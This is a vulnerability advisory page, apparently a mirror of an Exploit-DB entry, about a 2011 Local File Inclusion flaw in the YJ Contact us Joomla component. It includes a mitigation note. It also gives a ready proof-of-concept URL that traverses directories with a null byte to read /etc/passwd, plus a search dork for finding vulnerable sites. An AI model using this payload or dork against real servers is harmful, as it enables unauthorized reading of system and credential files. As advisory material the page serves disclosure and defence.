YJ Contact us - Enhanced Joomla Contact Form

vendor:

by:

MeGo

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: YJ Contact us - Enhanced Joomla Contact Form

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

YJ Contact us – Enhanced Joomla Contact Form <= Local File Inclusion Vulnerability

YJ Contact us - Enhanced Joomla Contact Form is vulnerable to a Local File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable application. This can allow the attacker to read arbitrary files from the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.

Source

Exploit-DB raw data:

================================================================================
  
  - YJ Contact us - Enhanced Joomla Contact Form <= Local File Inclusion Vulnerability
   
       Software : YJ Contact us - Enhanced Joomla Contact Form 
       Vendor   : http://www.youjoomla.com/yj-contact-us-enhanced-joomla-contact-form-2.html
       Author   : Mego
       Contact  : nowar204[at]hotmail[dot]com
       Home     : NONE
 
================================================================================
 
  - Exploit
 
       http://localhost/[path]/index.php?option=com_yjcontactus&view=[LFI]
 
 
  - PoC
 
       http://localhost/[path]/index.php?option=com_yjcontactus&view=../../../../../../../../../../../../../../../../../../../etc/passwd%00
 
 
  - Dork
 
       "com_yjcontactus"+view
 
================================================================================
 
  - Greetz
 
       norgod,g0ld,vnc and all brazilian c0ders
 
================================================================================
 
  - October 25 2011 - Morocco